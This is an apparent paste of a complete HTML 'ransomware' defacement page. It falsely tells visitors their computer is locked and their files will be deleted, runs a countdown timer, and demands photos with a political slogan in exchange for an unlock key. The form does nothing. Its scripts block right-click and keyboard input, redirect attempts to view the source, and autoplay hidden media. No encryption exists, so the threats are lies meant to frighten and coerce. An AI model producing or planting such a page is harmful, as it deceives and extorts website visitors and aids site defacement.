· 6 years ago · Dec 09, 2019, 05:10 AM
1<iframe width="0%" height="0" scrolling="no" frameborder="no" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/20990786&color=%23ff5500&auto_play=yes&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true"></iframe>
2<html>
3 <head>
4 <title>Nrasnomware Dz Team</title>
5<link href="http://cdn.mysitemyway.com/etc-mysitemyway/icons/legacy-previews/icons/simple-red-square-icons-business/128651-simple-red-square-icon-business-lock6-sc48.png" rel="shortcut icon">
6<meta name="author" content="Team iDiot">
7 </head>
8<script type='text/javascript'>
9//<![CDATA[
10shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://www.google.co.id/search?q=pencuri&spell=1&sa=X&ved=0ahUKEwj5792z6_PVAhWBLI8KHV3sDO8QBQgnKAA&biw=1366&bih=667"});
11//]]>
12</script>
13<body oncontextmenu='return false' onkeydown='return false' onmousedown='return false'>
14
15
16 <body onload="getSeconds()">
17 <center> <pre>
18<img src="http://icons.iconarchive.com/icons/graphicloads/colorful-long-shadow/256/Lock-icon.png
19">
20<font color="black">
21Send me 10 photos of you with a message: Long live Palestine free
22----------------------------------------------
23Facebook: fb.com/khelfatni
24</font></pre>
25 <font color="black">
26 <form action="" method="post" style=" text-align: center;">
27 <label>Key : </label>
28 <input type="text" name="key" class="inpute" placeholder="your unlock key">
29 <button onclick="myFunction()">UNLOCK SITE</button>
30 <script>
31
32function myFunction() {
33 var txt;
34 if (confirm("Your payment information was not correct!. Bayar kontlo....") == true) {
35 txt = "";
36 } else {
37 txt = "";
38 }
39 document.getElementById("demo").innerHTML = txt;
40}
41</script>
42 <br>
43 <br>
44 <font color="black">All files will be deleted on<br> <script type="text/javascript">
45var cday;
46var timeInSecs;
47var ticker;
48
49function getSeconds() {
50var now = new Date();
51var nowtime= now.getTime(); // time now in milliseconds
52var countdowntime = new Date(now.getFullYear(),now.getMonth(),now.getDate(),20,0,0); // 16 hrs = 4 pm
53// countdowntime - change time hh,mm,ss to whatever time required, e.g. 7,50,0 (0750)
54
55var dy = 5 ; // Friday (day 5) - change for other days 0-6
56var atime = countdowntime.getTime();
57var diff = parseInt((atime - nowtime)/1000); // positive if date is in future
58if (diff >0) {
59cday = dy - now.getDay();
60}
61else {
62cday = dy - now.getDay() -1;
63}
64if (cday < 0) { cday += 7; } // aleady passed countdown time, so go for next week
65if (diff <= 0) { diff += (86400 * 7) }
66startTimer (diff);
67}
68
69function startTimer(secs) {
70timeInSecs = parseInt(secs);
71ticker = setInterval("tick()",1000);
72tick(); // to start counter display right away
73}
74
75function tick() {
76var secs = timeInSecs;
77if (secs>0) {
78timeInSecs--;
79}
80else {
81clearInterval(ticker); // stop counting at zero
82getSeconds(); // and start all over again!
83 }
84
85var days = Math.floor(secs/86400);
86secs %= 86400;
87var hours= Math.floor(secs/3600);
88secs %= 3600;
89var mins = Math.floor(secs/60);
90secs %= 60;
91var result = days +':';
92result += ((hours < 24 ) ? "0":"" ) + hours + ":" + ( (mins < 0) ? "0" : "" ) + mins
93+ ":" + ( (secs < 10) ? "0":"" ) + secs + "";
94document.getElementById("countdown").innerHTML = result;
95}
96</script>
97 <div id="CountDownLogo">
98 <span id="title" <="" span=""> <br><br> <span id="countdown">0:08:44:28</span> </span>
99 </div> <br> <br> </font>
100 </form>
101 <div
102style="background-color:white;font-color:black;">
103 <font color="black"> <br> <font color="black"> <b><u>Your Computer has been locked/u></b> </font> <br> You can only unlock it with the special unlock code, Go to Gmail.com or protonmail.com and create an account . <br> send an email anonymouxxxxx@gmail.com . When you send me the pictures on my email , i will reply you in 24 hours <br> <br> <font color="black"> <b><u>How will my files be decrypted after sending pictures ?</u></b> </font> <br> <style>body{background-color:red}
104#q{font:40px courier
105new;color:white;}
106#f{font:20px courier
107new;color:white;}
108</style> The Virus decode code will be sent to you when you receive the images directly . <br> Time is limited to you , available only on a week ;) . <br> <br> <b><u>Where i can Contact You ?</u></b> <br> Contact Me On <a href="https://www.facebook.com/khelfatni" target="blank_">Here</a> <br> <br> <b><u>If you need more assistance, you can send message to us</u></b> <br> <br> <embed src="http://www.youtube.com/v/F-KsiD517Io&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"> </font>
109 </div></font>
110 </div>
111 </center>
112 </body>
113</html>